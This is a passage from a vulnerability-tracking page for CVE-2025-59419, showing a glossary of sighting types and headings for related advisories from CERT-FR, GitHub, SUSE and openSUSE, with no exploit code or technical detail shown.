      "title": "CVE-2025-59419"
    }
  ]
}

Tags

Taxonomy of the tags.

All sightings related to this event Export sightings related to this event

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-59419 (GCVE-0-2025-59419)

FKIE_CVE-2025-59419

CERTFR-2025-AVI-1024

Solutions

CERTFR-2025-AVI-1024

Solutions

GHSA-JQ43-27X9-3V86

Summary

Details

PoC

Impact

SUSE-SU-2025:4087-1

OPENSUSE-SU-2025:15667-1

Tags

Sightings

Nomenclature